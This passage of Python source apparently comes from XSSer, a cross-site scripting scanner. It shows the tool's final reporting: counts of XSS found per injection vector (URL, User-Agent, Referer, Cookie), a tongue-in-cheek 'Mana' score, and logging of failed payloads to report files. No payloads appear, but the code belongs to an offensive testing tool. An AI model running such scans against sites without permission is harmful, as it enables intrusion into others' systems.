  3269. self.report("\n" + '='*50)
  3270. total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
  3271. self.report("\n" + '-'*50)
  3272. self.report("Total XSS Discovered:", total_discovered)
  3273. self.report('-'*50)
  3274. self.report("Checker:", self.false_positives, "|",
  3275. "Manual:",self.manual_found, "|", "Auto:",
  3276. self.auto_found, "|", "DCP:", self.dcp_found,
  3277. "|", "DOM:", self.dom_found, "|", "Induced:",
  3278. self.httpsr_found, "|" , "XSR:", self.xsr_found,
  3279. "|", "XSA:", self.xsa_found, "|", "COO:",
  3280. self.coo_found)
  3281. self.report('-'*50)
  3282. self.report("False positives:", self.false_positives, "|",
  3283. "Vulnerables:",
  3284. total_discovered - self.false_positives)
  3285. self.report('-'*25)
  3286. # efficiency ranking:
  3287. # algor= vulnerables + false positives - failed * extras
  3288. mana = 0
  3289. h_found = 0
  3290. for h in self.hash_found:
  3291. h_found = h_found + 1
  3292. if h_found > 3:
  3293. mana = mana + 4500
  3294. if h_found == 1:
  3295. mana = mana + 500
  3296. if self.options.reversecheck:
  3297. mana = mana + 200
  3298. if total_payloads > 100:
  3299. mana = mana + 150
  3300. if not self.options.xsser_gtk:
  3301. mana = mana + 25
  3302. if self.options.discode:
  3303. mana = mana + 100
  3304. if self.options.proxy:
  3305. mana = mana + 100
  3306. if self.options.threads > 9:
  3307. mana = mana + 100
  3308. if self.options.heuristic:
  3309. mana = mana + 100
  3310. if self.options.finalpayload or self.options.finalremote:
  3311. mana = mana + 100
  3312. if self.options.script:
  3313. mana = mana + 100
  3314. if self.options.Cem or self.options.Doo:
  3315. mana = mana + 75
  3316. if self.options.heuristic:
  3317. mana = mana + 50
  3318. if self.options.script and not self.options.fuzz:
  3319. mana = mana + 25
  3320. if self.options.followred and self.options.fli:
  3321. mana = mana + 25
  3322. if self.options.wizard:
  3323. mana = mana + 25
  3324. if self.options.dcp:
  3325. mana = mana + 25
  3326. if self.options.hash:
  3327. mana = mana + 10
  3328. mana = (len(self.hash_found) * mana) + mana
  3329. # enjoy it :)
  3330. self.report("Mana:", mana)
  3331. self.report("")
  3332. c = Curl()
  3333. if not len(self.hash_found) and self.hash_notfound:
  3334. if self.options.hash:
  3335. if self.options.statistics:
  3336. self.report('='*75 + '\n')
  3337. self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
  3338. else:
  3339. if self.options.target or self.options.heuristic:
  3340. self.report("")
  3341. if self.options.heuristic:
  3342. pass
  3343. else:
  3344. if self.options.statistics:
  3345. self.report('='*75 + '\n')
  3346. if self.options.fileoutput:
  3347. fout = open("XSSreport.raw", "w") # write better than append
  3348. fout.write("="*75)
  3349. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3350. fout.write("="*75 + "\n\n")
  3351. for h in self.hash_notfound:
  3352. if h[2] == 'heuristic':
  3353. if not h[4]:
  3354. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3355. else:
  3356. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3357. elif h[2] == 'hashing check':
  3358. if not h[4]:
  3359. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3360. else:
  3361. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3362. else:
  3363. if h[4]:
  3364. if h[2] == "XSA":
  3365. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3366. elif h[2] == "XSR":
  3367. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3368. elif h[2] == "COO":
  3369. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3370. else:
  3371. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3372. else:
  3373. if h[2] == "XSA":
  3374. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3375. elif h[2] == "XSR":
  3376. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3377. elif h[2] == "COO":
  3378. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3379. else:
  3380. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3381. fout.write("="*75 + "\n\n")
  3382. fout.close()
  3383. else:
  3384. # some exits and info for some bad situations:
  3385. if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
  3386. self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
  3387. if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
  3388. if self.options.xsser_gtk:
  3389. self.report('='*75)
  3390. self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
  3391. self.report('='*75 + '\n')
  3392. # print results to xml file
  3393. if self.options.filexml:
  3394. xml_report_results = xml_reporting(self)
  3395. try:
  3396. xml_report_results.print_xml_results(self.options.filexml)
  3397. except:
  3398. return
  3399. if __name__ == "__main__":
  3400. app = xsser()
  3401. options = app.create_options()
  3402. if options:
  3403. app.set_options(options)
  3404. app.run()
  3405. app.land(True)